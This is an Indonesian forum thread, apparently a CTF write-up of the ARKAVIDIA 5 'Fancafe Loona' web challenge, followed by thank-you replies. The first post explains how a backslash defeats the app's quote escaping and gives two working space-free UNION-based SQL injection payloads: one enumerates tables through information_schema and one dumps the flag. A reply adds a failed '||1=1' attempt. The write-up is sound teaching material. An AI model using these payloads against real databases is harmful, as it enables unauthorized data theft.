[Share] WRITEUP ARKAVIDIA 5: FANCAFE LOONA
#1
Diberikan website menggunakan go yang mempunyai fitur untuk mencari post dan melihat detail dari post, dengan route sebagai berikut.


[Image: Capture.PNG]

Kita juga diberikan akses terhadap source codenya yang bisa digunakan untuk memudahkan kita menemukan entrypoint eksploitasi pada aplikasi tersebut, dan ditemukan aplikasi sudah mengimplementasikan proteksi terhadap serangan SQL Injection.

[Image: Capture-1.PNG]

Namun sayang nya filter tersebut belum cukup untuk mengamankan dari serangan SQL Injection karena dapat di bypass dengan memanfaatkan backslash \ .

Quote:’ => \’
\’ => \\’

Dengan menggunakan \' kita dapat melakukan bypass terhadap filter tersebut, kemudian lakukan union dengan normal namun tanpa menggunakan spasi. Menggunakan payload berikut kita dapat memunculkan list table yang ada melalui information_schema.

Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,table_name,1,(1)from(information_schema.tables)where(table_schema)!=(0x696e666f726d6174696f6e5f736368656d61))#

[Image: Capture-2.PNG]
Kemudian fetch flag dari table secret dengan payload 
Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,flag,1,(1)from(secret))#

[Image: Capture-3.PNG]

#2
Wah mantep om, gk kepikiran pake union.
Pas itu cm nyoba payload asd\')||1=1# tp ttp msh error Sad

#3
mantul bro ! thanks for sharing Smile
Jangan Makan Tulang Kawan | Kurawa |

#4
mantap kali abdilah,,,
makasih ilmunyaa om,, Big Grin

#5
thanks bro sharingnya, ijin belajar
Every one Have Superiority that you don't know..

#6
Thanks Mank For shraingnya Big Grin






Users browsing this thread: 1 Guest(s)